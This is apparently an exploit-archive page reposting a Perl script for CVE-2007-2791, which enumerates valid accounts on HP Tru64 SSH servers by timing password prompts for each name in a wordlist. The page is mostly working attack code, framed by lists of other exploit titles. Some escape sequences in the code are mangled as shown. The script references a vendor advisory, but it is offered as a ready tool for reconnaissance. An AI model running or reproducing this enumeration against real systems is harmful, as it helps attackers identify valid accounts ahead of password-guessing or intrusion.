exploits , vulnerabilities , articles , HP Tru64 Remote Secure Shell User Enumeration Exploit (CVE-2007-2791)

2006-03-30 Tru64 UNIX 5.0 (Rev. 910) edauth NLSPATH Buffer Overflow Exploit
2006-03-30 Tru64 UNIX 5.0 (Rev. 910) rdist NLSPATH Buffer Overflow Exploit

2007-06-04

HP Tru64 Remote Secure Shell User Enumeration Exploit (CVE-2007-2791)

Rated as : High Risk

# tru64-sshenum.pl
# HP Tru64 Remote Secure Shell user enumeration exploit (CVE-2007-2791).
#
# Author: Andrea "bunker" Purificato
# http://rawlab.mindcreations.com
#
# The following supported software versions are affected:
#
#  HP Tru64 UNIX v5.1B-4
#  HP Tru64 UNIX v5.1B-3
# 
# The Hewlett-Packard Company thanks Andrea Purificato for reporting this

# vulnerability to security-alert@hp.com
#
# References: 
#  -
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?lang=en&cc=us&objectID=c01007552
#  - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2791
#  - http://rawlab.mindcreations.com/codes/exp/nix/tru64-sshenum.pl
#

my $verbose = undef;
my $port    = 22;
my $timeout = 10;

print <<BANNER;
$0 - HP Tru64 Remote Secure Shell user enumeration exploit

 Andrea "bunker" Purificato - http://rawlab.mindcreations.com
 37F1 A7A1 BB94 89DB A920  3105 9F74 7349 AF4C BFA2 

BANNER

print "Usage: $0 <target> <userlist>n" and exit(-1)
if ($#ARGV<1);

my $target   = $ARGV[0];
my $wordlist = $ARGV[1];
chomp (my $ssh  = `which ssh`);
chomp (my $tel  = `which telnet`);
my %htimes; my @atimes;

print "[+] Grabbing banner...n";
my $exp = Expect->spawn("$tel -l fake $target $port") 
	or die "Cannot spawn $tel: $!n";;
#$exp->log_stdout(0);
$exp->expect(5,['SSH|ssh'=>sub{$exp->send(".n")}]);
$exp->close();
print "[+] Done!nn";

sub timing {
    my $user = shift @_;
    my $t0 = gettimeofday;
    my $t1 = undef;
    my $exp = Expect->spawn("$ssh -l $user -p $port $target")

	or die "Cannot spawn $ssh: $!n";;
    $exp->log_stdout(0);
   
$exp->expect($timeout,['assword:'=>sub{$exp->send(".n")}]);
    $exp->expect(undef,   [
qr'assword|denied'=>sub{$t1=gettimeofday}]);
    $t1 = gettimeofday unless ($t1);
    $exp->close();
    return sprintf "%0.3f", ($t1-$t0);
}

tie my @wlst_ln, 'Tie::File', "$wordlist", mode=>O_RDONLY
    or die "$wordlist: $!";

print "[+] Started, please wait: ";
for (@wlst_ln) {
    print "($_ dup?)" if ($htimes{$_});
    my $ret = timing($_);
    $htimes{$_} = $ret unless ($htimes{$_});
    push @atimes, $ret;
    unless ($verbose) { print "." }
    else { print "$_tt$retn" }
}
print " Done!nn";

# 
# Do whatever you want with time values:
# 
# (sorted by values)
# 
foreach my $key (sort {$htimes{$b}<=>$htimes{$a}} keys %htimes) {
     print "$key:tt$htimes{$key}n";
}
exit(0);


securitydot.net - 2007-06-04

Exploits - newest 10 RSS | More

2007-06-15 55585 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 32947 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 41015 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 28547 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19105 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16147 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 18769 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16043 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 32716 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 16671 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit